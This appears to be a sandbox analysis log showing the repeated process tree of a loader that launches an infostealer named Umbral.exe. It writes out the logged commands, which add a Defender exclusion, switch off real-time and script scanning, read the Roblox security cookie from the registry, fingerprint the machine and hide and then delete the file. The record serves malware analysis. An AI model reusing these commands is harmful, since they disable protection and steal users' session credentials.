        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        71⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        71⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        71⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        71⤵
        
        PID:3860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        71⤵
        
        PID:3652
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        71⤵
        
        PID:2280
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        71⤵
        
        PID:4012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        71⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        69⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        69⤵
        
        PID:3764
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        68⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        68⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        67⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        67⤵
        
        PID:3184
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        66⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        66⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        65⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        65⤵
        
        PID:1952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        66⤵
        
        PID:2264
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        66⤵
        Views/modifies file attributes
        
        PID:3660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        
        PID:3584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        66⤵
        
        PID:4524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        66⤵
        
        PID:1136
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        66⤵
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3696
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        66⤵
        Detects videocard installed
        
        PID:1460
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1812
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        67⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        64⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        64⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        63⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        63⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        62⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        62⤵
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        61⤵
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        60⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        60⤵
        
        PID:236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:400
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        Views/modifies file attributes
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        61⤵
        
        PID:1608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:4304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        61⤵
        
        PID:240
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        61⤵
        
        PID:2164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:4520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:1940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        61⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2836
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        61⤵
        Detects videocard installed
        
        PID:4660
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        61⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4288
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        62⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        59⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        59⤵
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        58⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        57⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        57⤵
        
        PID:352
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        56⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        55⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        
        PID:4708
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:3252
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        Views/modifies file attributes
        
        PID:3344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:4736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        
        PID:4584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        56⤵
        
        PID:3344
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        56⤵
        
        PID:4712
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        56⤵
        Detects videocard installed
        
        PID:3248
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2308
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        54⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        54⤵
        
        PID:628
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        53⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        52⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        51⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        50⤵
        
        PID:1832
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:3744
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:2976
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        Views/modifies file attributes
        
        PID:1292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        51⤵
        
        PID:792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        51⤵
        
        PID:1564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        51⤵
        
        PID:5104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        51⤵
        
        PID:4232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        51⤵
        Detects videocard installed
        
        PID:436
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:3300
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        52⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:960
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        49⤵
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        48⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        47⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        46⤵
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        45⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        44⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:32
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        43⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:1832
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        42⤵
        
        PID:1464
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        41⤵
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        40⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        39⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        38⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        Drops file in Drivers directory
        
        PID:4788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:4344
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        Views/modifies file attributes
        
        PID:448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:3184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:2160
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        39⤵
        
        PID:3152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        39⤵
        
        PID:2104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:2424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4260
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        39⤵
        Detects videocard installed
        
        PID:1368
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1572
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        37⤵
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        36⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        35⤵
        
        PID:908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        Drops file in Drivers directory
        
        PID:1000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:3496
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        Views/modifies file attributes
        
        PID:1316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4472
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:3976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
